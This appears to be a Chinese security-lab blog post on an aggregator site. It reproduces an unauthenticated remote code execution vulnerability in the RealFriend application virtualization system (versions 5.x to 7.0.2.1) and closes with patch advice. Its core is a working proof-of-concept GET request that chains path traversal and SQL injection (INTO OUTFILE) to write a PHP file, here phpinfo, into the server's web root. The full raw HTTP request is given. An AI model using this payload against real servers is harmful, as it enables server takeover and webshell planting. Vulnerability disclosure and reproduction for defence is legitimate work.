服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

瑞友天翼应用虚拟化系统远程代码执行漏洞

日期: 来源:弥天安全实验室收集编辑:弥天安全实验室



网安引领时代,弥天点亮未来   





 


0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

瑞友天翼应用虚拟化系统是由西安瑞友信息技术资讯有限公司研发的具有自主知识产权的应用虚拟化平台,基于服务器计算架构。该系统可以将用户的各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过 WEB 即可快速安全地访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等功能。用户可以享受到集中、便捷、安全、高效的虚拟化功能。

该漏洞是由于瑞友天翼应用虚拟化系统存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。




0x02影响版本


访问系统 web 页面路径 /CASMain.XGI?cmd=About,点击关于即可查看瑞友天翼应用虚拟化系统版本。

5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.2.1



0x03漏洞复现

1.访问漏洞环境

查看版本

2.对漏洞进行复现

POC

/AgentBoard.XGI?cmd=UserLogin&user=../../../../../../../../../../../../../../../../../../Windows/win.ini'||'1'+LIMIT+0,1+INTO+OUTFILE+'C:/RealFriend/Rap+Server/WebRoot/test.php'+LINES+TERMINATED+BY+0x3c3f70687020706870696e666f28293b3f3e--+-

其中0x3c3f70687020706870696e666f28293b3f3e为<?php phpinfo();?>

GET /AgentBoard.XGI?cmd=UserLogin&user=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini%00%27%7C%7C%271%27+LIMIT+0%2C1+INTO+OUTFILE+%27C%3A%2FRealFriend%2FRap+Server%2FWebRoot%2Ftest.php%27+LINES+TERMINATED+BY+0x3c3f70687020706870696e666f28293b3f3e--+- HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0Dnt: 1

通过INTO OUTFILE写入文件,访问解析php文件。



3.xray工具测试(漏洞存在)




0x04修复建议

目前官方已发布安全更新,建议受影响用户尽快更新到安全版本: 瑞友天翼应用虚拟化系统 V7.0.3.1

http://www.realor.cn


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,
予以风动,
必降弥天之润!


   弥  天

安全实验室

相关阅读

  • 银行数据治理:数据质量管理实践

  • 现代商业银行日常经营活动中积累了大量数据,这些数据除了支持银行前台业务流程运转之外,越来越多地被用于决策支持领域,风险控制、产品定价、绩效考核等管理决策过程也都需要大
  • 规则推荐,这个合集一般人不敢用!

  • 不星标可能收不到消息,记得星标公众号回复QQ群获取群号前言今天给大家推荐一个轻合集小程序,由153大佬维护,它叫轻合集.鬼屋,不过其实并不是全是恐怖小程序轻合集.鬼屋什么时候
  • 两个规则修复,务必更新!

  • 不星标可能收不到消息,记得星标公众号回复QQ群获取群号前言小棉袄最近发现AI豌豆这个小程序规则失效了,于是简单修复了一下,同时给大家分享一下豌豆AI这个规则的最新版两个豌豆
  • 优质规则已修复!

  • 不星标可能收不到消息,记得星标公众号回复QQ群获取群号前言今天又给大家分享一个规则,JustLive,Joe大佬修复版JustLive规则根据同名网站写来的,支持虎芽、逗鱼等4个平台的直播,支
  • 为什么进程地址空间中包括操作系统?

  • 将 脚本之家 设为“星标⭐”第一时间收到文章更新出品 | 码农的荒岛求生 (ID:escape-it)已获得原公众号的授权转载大家好,今天聊聊进程地址空间这点小事。说到进程的地址空间,大
  • 一级翻译和译审评审答疑精华(18)

  • 1.一级成绩单有纸质的嘛?一级翻译证书在哪里领?答:有,纸质版需去当地人事考试中心领取。一级翻译考试只有成绩单,没有证书,只有职称申报过后有职称证书。2.单位意见是省外办吗?答:不
  • 以系统思维全面助力乡村振兴事业发展

  •  乡村振兴关系着我国“三农”工作的科学发展,也是我国社会主义现代化建设的重要环节。系统思维以系统论为基本思维模式,关注全面性和整体性,注重从系统和要素、要素和要素、系

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四
  • 美国对华2000亿关税清单,到底影响有多大?

  • 1 今天A股大跌,上证最大跌幅超过2%。直接导火索是美国证实计划对华2000亿美元产品加征25%关税。 听起来,2000亿美元数目巨大,我们来算笔账。 2000亿美元,按现在人民币汇率

最新文章

  • 瑞友天翼应用虚拟化系统远程代码执行漏洞

  • 网安引领时代,弥天点亮未来 0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!0x01漏洞介绍瑞友天翼应用虚拟化系统是由西安瑞友信息技术资讯
  • 腧穴学习笔记-手阳明大肠经

  • 腧穴学习笔记手阳明大肠经穴学习《针灸基本功》与《针灸腧穴通考》时的笔记。经手阳明大肠经1. 宋以前手足三里通称三里、五里,宋以后手阳明“三里”“五里”为“手三里”、
  • 【壹馆·生日】三月·杏雨清风·敬君一杯

  • + ✦ +孙安宁 to 杨耀嘉TO:小羊新岁可期,生日快乐!21岁的我们继续吃吃喝喝,一起沉迷,一起傻乐,一起飞驰在公路上。因为疫情封在宿舍里,也不忘时刻享受和热爱生活。新的一岁愿你在
  • 国科大er考试不焦虑!来看锦鲤附体的方式

  • 进入考试月帮大家带来了【逢考必过】锦鲤符 看到就会变身「锦鲤体质」!那么如何让自己彻底成为升学锦鲤呢,提升背景的方式来了!项目涵盖文理工商「全科科研课表」5月上新!!!左右